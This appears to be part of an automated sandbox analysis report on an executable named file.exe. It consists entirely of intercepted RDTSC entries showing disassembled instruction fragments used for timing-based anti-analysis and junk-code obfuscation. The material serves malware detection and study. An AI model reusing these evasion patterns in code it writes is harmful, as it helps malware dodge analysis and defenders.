              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43280 second address: D43285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43285 second address: D4328B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D422F7 second address: D42313 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4328B second address: D4328F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4328F second address: D43293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42313 second address: D423C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jns 00007FAC2C5039A9h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 xor bh, FFFFFFA9h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007FAC2C5039A8h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 0000001Bh 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d mov edi, ecx 0x0000003f mov edi, 1FC69B00h 0x00000044 mov eax, dword ptr [ebp+122D0F85h] 0x0000004a mov ebx, dword ptr [ebp+1244DD63h] 0x00000050 jmp 00007FAC2C5039ADh 0x00000055 push FFFFFFFFh 0x00000057 cmc 0x00000058 jc 00007FAC2C5039ACh 0x0000005e nop 0x0000005f jmp 00007FAC2C5039B2h 0x00000064 push eax 0x00000065 pushad 0x00000066 jmp 00007FAC2C5039B4h 0x0000006b push ebx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43401 second address: D4341F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007FAC2CCCA0D6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jne 00007FAC2CCCA0D8h 0x00000014 jp 00007FAC2CCCA0DCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A170 second address: D4A176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4AB9 second address: CE4ABF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4ABF second address: CE4AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4AC9 second address: CE4ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4ACD second address: CE4AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51A1A second address: D51A4B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FAC2CCCA0E2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FAC2CCCA0E5h 0x00000011 jmp 00007FAC2CCCA0DDh 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51A4B second address: D51A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51A4F second address: D51A86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FAC2CCCA0EBh 0x0000000f jmp 00007FAC2CCCA0E3h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push ecx 0x00000018 jo 00007FAC2CCCA0DCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51A86 second address: D51A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53355 second address: D5336D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FAC2CCCA0DCh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5336D second address: D5338F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FAC2C5039B2h 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58397 second address: D5839D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5839D second address: D583BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FAC2C5039B0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D583BE second address: D583C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57855 second address: D5786C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B0h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57B1A second address: D57B5E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAC2CCCA0D6h 0x00000008 jmp 00007FAC2CCCA0E5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jno 00007FAC2CCCA0EDh 0x00000015 pop ecx 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57B5E second address: D57B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57CD0 second address: D57CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57E52 second address: D57E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5823D second address: D58247 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAC2CCCA0D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58247 second address: D5824D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B7C7 second address: D5B7CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EDCF second address: D5EDD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EDD8 second address: D5EDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAC2CCCA0D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EDE2 second address: D5EDF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EDF9 second address: D5EDFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EDFD second address: D5EE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2641D second address: D26423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26423 second address: D2647B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FAC2C5039A8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 or cx, E94Dh 0x0000002a lea eax, dword ptr [ebp+1247D1ABh] 0x00000030 jmp 00007FAC2C5039B3h 0x00000035 push eax 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 jno 00007FAC2C5039A6h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2647B second address: D0C5BF instructions: 0x00000000 rdtsc 0x00000002 je 00007FAC2CCCA0D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FAC2CCCA0D8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov cl, CEh 0x0000002e call dword ptr [ebp+122D34D8h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a jmp 00007FAC2CCCA0DFh 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26665 second address: D2666A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26D26 second address: D26D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26D2A second address: D26D2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26D2E second address: D26D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FAC2CCCA0D6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26EDE second address: D26EEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D270B0 second address: D270B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D275AE second address: D275B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D275B2 second address: D275B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D275B6 second address: D275C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D275C0 second address: D275C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2770C second address: D27745 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAC2C5039BEh 0x00000008 jmp 00007FAC2C5039B8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAC2C5039B4h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27745 second address: D2774A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2795E second address: D279A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAC2C5039ACh 0x00000009 popad 0x0000000a push edi 0x0000000b jl 00007FAC2C5039A6h 0x00000011 pop edi 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 mov di, dx 0x00000019 lea eax, dword ptr [ebp+1247D1EFh] 0x0000001f add edx, dword ptr [ebp+122D365Dh] 0x00000025 push edi 0x00000026 call 00007FAC2C5039ADh 0x0000002b mov edx, eax 0x0000002d pop ecx 0x0000002e pop ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jns 00007FAC2C5039A6h 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D279A6 second address: D0D131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FAC2CCCA0D8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 lea eax, dword ptr [ebp+1247D1ABh] 0x0000002d movsx edi, si 0x00000030 nop 0x00000031 pushad 0x00000032 jmp 00007FAC2CCCA0E4h 0x00000037 jmp 00007FAC2CCCA0DBh 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007FAC2CCCA0E0h 0x00000043 nop 0x00000044 push 00000000h 0x00000046 push ebx 0x00000047 call 00007FAC2CCCA0D8h 0x0000004c pop ebx 0x0000004d mov dword ptr [esp+04h], ebx 0x00000051 add dword ptr [esp+04h], 00000017h 0x00000059 inc ebx 0x0000005a push ebx 0x0000005b ret 0x0000005c pop ebx 0x0000005d ret 0x0000005e mov dword ptr [ebp+122D395Fh], esi 0x00000064 call dword ptr [ebp+122D1813h] 0x0000006a ja 00007FAC2CCCA0EAh 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 push edi 0x00000075 pop edi 0x00000076 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D131 second address: D0D13D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jng 00007FAC2C5039A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F1B1 second address: D5F1BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F1BF second address: D5F1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F337 second address: D5F35B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FAC2CCCA0DBh 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007FAC2CCCA0D6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F35B second address: D5F35F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F4D5 second address: D5F4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F7AA second address: D5F7B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F8EB second address: D5F900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FAC2CCCA0D8h 0x0000000b jbe 00007FAC2CCCA0DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D11A second address: D0D126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAC2C5039A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D126 second address: D0D131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D659F0 second address: D65A06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FAC2C5039B0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9A20 second address: CE9A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D647C5 second address: D64802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAC2C5039B2h 0x0000000b popad 0x0000000c jmp 00007FAC2C5039B3h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007FAC2C5039AEh 0x0000001a pushad 0x0000001b popad 0x0000001c jnp 00007FAC2C5039A6h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64802 second address: D6480C instructions: 0x00000000 rdtsc 0x00000002 js 00007FAC2CCCA0DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64A9B second address: D64AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAC2C5039ABh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64AAF second address: D64AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64AB3 second address: D64ABD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAC2C5039A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64C0C second address: D64C1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64C1C second address: D64C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64C22 second address: D64C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAC2CCCA0DFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64C37 second address: D64C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64C3B second address: D64C56 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAC2CCCA0DEh 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64C56 second address: D64C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64C5A second address: D64C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FAC2CCCA0D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6501D second address: D65024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65024 second address: D6502C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6CDD9 second address: D6CDE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007FAC2C5039A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C11C second address: D6C120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6CAC3 second address: D6CAC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6CAC9 second address: D6CAF0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAC2CCCA0D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAC2CCCA0E9h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74A34 second address: D74A4F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnp 00007FAC2C5039A6h 0x0000000d pop ecx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74A4F second address: D74A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74BCB second address: D74BD0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74E70 second address: D74E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D773DA second address: D773F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAC2C5039ABh 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D773F1 second address: D773FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FAC2CCCA0D6h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D773FE second address: D77404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D77404 second address: D77408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
